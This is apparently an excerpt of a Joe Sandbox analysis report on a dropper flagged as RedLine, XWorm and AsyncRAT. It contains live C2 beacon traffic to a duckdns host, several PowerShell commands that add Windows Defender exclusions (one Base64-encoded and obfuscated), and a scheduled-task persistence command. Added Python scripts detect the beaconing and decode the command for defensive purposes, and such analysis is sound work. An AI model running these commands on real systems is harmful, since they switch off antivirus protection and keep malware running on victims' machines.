                                                                     Host: duclog23.duckdns.org:37552
                                                                     Content-Length: 137
                                                                     Expect: 100-continue
                                                                     Accept-Encoding: gzip, deflate
                                                                     Connection: Keep-Alive


Session ID   Source IP      Source Port   Destination IP   Destination Port   PID    Process
7            192.168.2.10   49923         192.169.69.26    37552              8096   C:\Users\user\AppData\Roaming\M2.exe

Timestamp                            Bytes transferred   Direction   Data
Dec 9, 2024 11:06:23.265655994 CET   247                 OUT         POST / HTTP/1.1
                                                                     Content-Type: text/xml; charset=utf-8
                                                                     SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                     Host: duclog23.duckdns.org:37552
                                                                     Content-Length: 137
                                                                     Expect: 100-continue
                                                                     Accept-Encoding: gzip, deflate
                                                                     Connection: Keep-Alive


Session ID   Source IP      Source Port   Destination IP   Destination Port   PID    Process
8            192.168.2.10   49960         192.169.69.26    37552              8096   C:\Users\user\AppData\Roaming\M2.exe

Timestamp                            Bytes transferred   Direction   Data
Dec 9, 2024 11:06:38.777611017 CET   247                 OUT         POST / HTTP/1.1
                                                                     Content-Type: text/xml; charset=utf-8
                                                                     SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                     Host: duclog23.duckdns.org:37552
                                                                     Content-Length: 137
                                                                     Expect: 100-continue
                                                                     Accept-Encoding: gzip, deflate
                                                                     Connection: Keep-Alive
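
The nine HTTP sessions above show two behaviours worth turning into detection logic: M2.exe (PID 8096) POSTs a SOAP request with SOAPAction "http://tempuri.org/Endpoint/CheckConnect" to duclog23.duckdns.org:37552 roughly every 15 seconds, and Metin.exe (PID 7184) asks ip-api.com "/line/?fields=hosting" whether the host sits in a hosting provider's address space (the report lists this as "Check if machine is in data center or colocation facility"; the answer here was "false"). The script below is an added example, not part of the Joe Sandbox report: it replays the timestamps and request metadata copied from sessions 0 through 8, tags each request, and measures the check-in interval and its jitter so a regular beacon can be told apart from user-driven traffic. The tag names, the periodicity thresholds and the record layout are our own choices.

```python
import re
from datetime import datetime
from statistics import mean, pstdev

# Timestamps, destinations, PIDs and request metadata copied from the report's
# HTTP sessions 0-8 above. Tuple layout (ours): (timestamp, "dest:port", pid,
# request line, SOAPAction header value or None).
SOAP = "http://tempuri.org/Endpoint/CheckConnect"
SESSIONS = [
    ("Dec 9, 2024 11:04:50.178194046 CET", "192.169.69.26:37552", 8096, "POST / HTTP/1.1", SOAP),
    ("Dec 9, 2024 11:04:54.396163940 CET", "208.95.112.1:80", 7184, "GET /line/?fields=hosting HTTP/1.1", None),
    ("Dec 9, 2024 11:05:05.793296099 CET", "192.169.69.26:37552", 8096, "POST / HTTP/1.1", SOAP),
    ("Dec 9, 2024 11:05:21.358750105 CET", "192.169.69.26:37552", 8096, "POST / HTTP/1.1", SOAP),
    ("Dec 9, 2024 11:05:36.934004068 CET", "192.169.69.26:37552", 8096, "POST / HTTP/1.1", SOAP),
    ("Dec 9, 2024 11:05:52.386322021 CET", "192.169.69.26:37552", 8096, "POST / HTTP/1.1", SOAP),
    ("Dec 9, 2024 11:06:07.825258970 CET", "192.169.69.26:37552", 8096, "POST / HTTP/1.1", SOAP),
    ("Dec 9, 2024 11:06:23.265655994 CET", "192.169.69.26:37552", 8096, "POST / HTTP/1.1", SOAP),
    ("Dec 9, 2024 11:06:38.777611017 CET", "192.169.69.26:37552", 8096, "POST / HTTP/1.1", SOAP),
]

# "Mon D, YYYY HH:MM:SS.nnnnnnnnn CET" as printed by the sandbox; the fraction has nine digits.
TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) CET$")


def parse_ts(text):
    """Parse a report timestamp; nanoseconds are truncated to the microseconds datetime can hold."""
    m = TS_RE.match(text)
    if not m:
        raise ValueError("unrecognised timestamp: %r" % text)
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    return base.replace(microsecond=int(m.group(2)[:6].ljust(6, "0")))


def classify(session):
    """Return the detection tags (our names) that apply to one request."""
    _, _, _, request_line, soap_action = session
    tags = []
    # A WCF service left on the tempuri.org default namespace, polled with a
    # fixed "CheckConnect" action, is a check-in loop rather than a web app.
    if soap_action and "tempuri.org/Endpoint/CheckConnect" in soap_action:
        tags.append("soap-checkconnect-beacon")
    # ip-api.com's "hosting" field tells the caller whether it runs in a data
    # center, which is how this sample decides it is inside a sandbox.
    if "fields=hosting" in request_line:
        tags.append("hosting-provider-check")
    return tags


def beacon_profile(sessions, dest):
    """Count requests to dest and measure the gap between consecutive ones (seconds)."""
    stamps = sorted(parse_ts(s[0]) for s in sessions if s[1] == dest)
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    if not gaps:
        return {"count": len(stamps), "mean_gap": None, "jitter": None}
    return {"count": len(stamps), "mean_gap": mean(gaps), "jitter": pstdev(gaps)}


def is_periodic(profile, min_count=5, max_jitter=1.0):
    """Several check-ins whose spacing varies by under a second is a sleep loop, not a human."""
    return (profile["count"] >= min_count
            and profile["jitter"] is not None
            and profile["jitter"] <= max_jitter)


if __name__ == "__main__":
    for s in SESSIONS:
        print(s[0], s[1], "pid", s[2], classify(s))
    c2 = beacon_profile(SESSIONS, "192.169.69.26:37552")
    print(c2, "periodic" if is_periodic(c2) else "irregular")
```

On this capture the C2 profile comes out at eight requests, a mean gap of about 15.5 seconds and a jitter of well under a tenth of a second, which is what a hard-coded sleep between check-ins looks like; the single ip-api.com request is not periodic but is tagged on its own because the hosting lookup is an evasion step regardless of how often it runs.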


                                                                                                                  Target ID:1
                                                                                                                  Start time:05:04:45
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\Desktop\f5ATZ1i5CU.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\f5ATZ1i5CU.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:261'120 bytes
                                                                                                                  MD5 hash:854A42E9A581B2A33CEDA0F3D3DD2F04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000002.1271334690.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:05:04:45
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA="
                                                                                                                  Imagebase:0xa90000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true
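
The -EncodedCommand value in the Target ID 2 command line is Base64 over UTF-16LE, and once decoded it contains junk `<# ... #>` block comments spliced between the tokens so that the plain text never contains a contiguous "Add-MpPreference -ExclusionPath" string. The decoder below is an added example, not part of the Joe Sandbox report: it takes the encoded string exactly as shown above, recovers the script, strips the comment padding, and flags the Defender-tampering cmdlet and parameter that remain. The list of cmdlets and parameters it looks for is our own and deliberately short.

```python
import base64
import re

# The -EncodedCommand argument copied verbatim from the Target ID 2 command line above.
ENCODED = (
    "PAAjAHcAYwB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYgBi"
    "ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUA"
    "cgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAj"
    "AGgAYgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB6ACMAPgA="
)

# PowerShell block comments; non-greedy so adjacent comments are removed one at a time.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)

# Cmdlets and parameters that weaken Defender when they show up in a decoded
# command. This list is ours and covers only the common exclusion/disable knobs.
DEFENDER_TAMPER = (
    "add-mppreference",
    "set-mppreference",
    "-exclusionpath",
    "-exclusionprocess",
    "-exclusionextension",
    "-disablerealtimemonitoring",
    "-disableioavprotection",
)


def decode_encoded_command(b64):
    """-EncodedCommand is Base64 over UTF-16LE; decoding it as UTF-8 gives NUL-riddled junk."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script):
    """Drop <# ... #> comments (used here as signature-breaking padding) and squeeze whitespace."""
    return " ".join(BLOCK_COMMENT.sub("", script).split())


def defender_tamper_hits(script):
    """Return the known Defender-tampering tokens present, in list order."""
    low = script.lower()
    return [token for token in DEFENDER_TAMPER if token in low]


def analyse(b64):
    """Decode, de-obfuscate and tag one encoded command line."""
    raw = decode_encoded_command(b64)
    clean = strip_block_comments(raw)
    return {
        "raw": raw,
        "clean": clean,
        "obfuscated": raw != clean,
        "defender_tamper": defender_tamper_hits(clean),
    }


if __name__ == "__main__":
    result = analyse(ENCODED)
    print("decoded :", result["raw"])
    print("cleaned :", result["clean"])
    print("flags   :", result["defender_tamper"])
```

The cleaned command is "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force": the whole user profile and the entire system drive are excluded from Defender scanning before the dropped payloads in %AppData%\Roaming are written, which is why the report raises both "Adds a directory exclusion to Windows Defender" and the Sigma rule for a Base64-encoded MpPreference cmdlet. Matching on the decoded and comment-stripped text, rather than on the raw command line, is what makes the comment padding ineffective.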

                                                                                                                  Target ID:5
                                                                                                                  Start time:05:04:46
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:05:04:46
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\M2.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\M2.exe"
                                                                                                                  Imagebase:0x2f0000
                                                                                                                  File size:97'792 bytes
                                                                                                                  MD5 hash:2598B5FEE38D9C0979F009E77F94EA33
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000006.00000000.1266996423.00000000002F2000.00000002.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: unknown
                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Roaming\M2.exe, Author: ditekSHen
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 89%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:8
                                                                                                                  Start time:05:04:46
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:9
                                                                                                                  Start time:05:04:46
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Metin.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Metin.exe"
                                                                                                                  Imagebase:0x970000
                                                                                                                  File size:52'736 bytes
                                                                                                                  MD5 hash:1D846637AA409D6DD4FD14F70A63F907
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.2542545307.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000000.1268593061.0000000000972000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000009.00000002.2542545307.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Metin.exe, Author: ditekSHen
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 96%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:14
                                                                                                                  Start time:05:04:54
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Metin.exe'
                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:15
                                                                                                                  Start time:05:04:54
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:17
                                                                                                                  Start time:05:05:08
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Metin.exe'
                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:18
                                                                                                                  Start time:05:05:08
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:19
                                                                                                                  Start time:05:05:21
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Chrome.exe'
                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:20
                                                                                                                  Start time:05:05:21
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:21
                                                                                                                  Start time:05:05:39
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome.exe'
                                                                                                                  Imagebase:0x7ff7b2bb0000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:22
                                                                                                                  Start time:05:05:39
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:25
                                                                                                                  Start time:05:06:04
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome" /tr "C:\Users\user\AppData\Roaming\Chrome.exe"
                                                                                                                  Imagebase:0x7ff60fac0000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:26
                                                                                                                  Start time:05:06:04
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff620390000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:27
                                                                                                                  Start time:05:06:06
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                                  Imagebase:0x420000
                                                                                                                  File size:52'736 bytes
                                                                                                                  MD5 hash:1D846637AA409D6DD4FD14F70A63F907
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: Joe Security
                                                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Chrome.exe, Author: ditekSHen
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 96%, ReversingLabs
                                                                                                                  Has exited:true

                                                                                                                  Target ID:30
                                                                                                                  Start time:05:06:14
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Chrome.exe"
                                                                                                                  Imagebase:0xc90000
                                                                                                                  File size:52'736 bytes
                                                                                                                  MD5 hash:1D846637AA409D6DD4FD14F70A63F907
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:31
                                                                                                                  Start time:05:06:22
                                                                                                                  Start date:09/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Chrome.exe"
                                                                                                                  Imagebase:0xe30000
                                                                                                                  File size:52'736 bytes
                                                                                                                  MD5 hash:1D846637AA409D6DD4FD14F70A63F907
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true


                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:50%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:3.8%
                                                                                                                    Total number of Nodes:53
                                                                                                                    Total number of Limit Nodes:2
                                                                                                                    execution_graph 88 4014d1 memset SetUnhandledExceptionFilter __set_app_type _controlfp __getmainargs 91 40145b 88->91 90 401574 exit 92 401476 91->92 95 40108c 92->95 94 40149f 94->90 120 401000 malloc 95->120 98 401000 malloc 99 4010be 98->99 100 401000 malloc 99->100 101 4010d5 ShellExecuteA memset memset 100->101 102 4011a3 101->102 103 4013aa 102->103 104 4011c6 strcmp 102->104 103->94 105 4011f3 104->105 106 40123d 104->106 107 401000 malloc 105->107 108 401000 malloc 106->108 109 401225 strcpy 107->109 110 401269 getenv 108->110 111 4012c7 fopen 109->111 112 401000 malloc 110->112 114 401000 malloc 111->114 113 4012aa sprintf 112->113 113->111 115 401314 fwrite fclose 114->115 116 4013a5 115->116 117 40136c 115->117 116->94 118 401000 malloc 117->118 119 40137d ShellExecuteA 118->119 119->116 121 401031 120->121 121->98 122 401582 _controlfp 123 40108c 12 API calls 122->123 124 4015dc 123->124 125 4011b7 126 4011a3 125->126 127 4011c6 strcmp 125->127 126->127 128 4013aa 126->128 129 4011f3 127->129 130 40123d 127->130 131 401000 malloc 129->131 132 401000 malloc 130->132 133 401225 strcpy 131->133 134 401269 getenv 132->134 135 4012c7 fopen 133->135 136 401000 malloc 134->136 138 401000 malloc 135->138 137 4012aa sprintf 136->137 137->135 139 401314 fwrite fclose 138->139 140 4013a5 139->140 141 40136c 139->141 142 401000 malloc 141->142 143 40137d ShellExecuteA 142->143 143->140 144 4014af _XcptFilter

                                                                                                                    Callgraph

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1269768164.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1269691384.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1269983435.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1270056886.0000000000428000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_f5ATZ1i5CU.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3649950142-0
                                                                                                                    • Opcode ID: d919a114d98266336884f140e47bd302947eef9c678e8b5ee46a87026b7dd41d
                                                                                                                    • Instruction ID: 5c8374e601bb470c3729058ffa5bbb1f79a7e2c4f5fccbe78a01980999ae235b
                                                                                                                    • Opcode Fuzzy Hash: d919a114d98266336884f140e47bd302947eef9c678e8b5ee46a87026b7dd41d
                                                                                                                    • Instruction Fuzzy Hash: E0113CF9E00104ABCB10FBA8DC85F4B77EDAB08304F450475F805E3365E939E9048B68

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1269768164.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1269691384.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1269983435.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1270056886.0000000000428000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_f5ATZ1i5CU.jbxd
                                                                                                                    Similarity
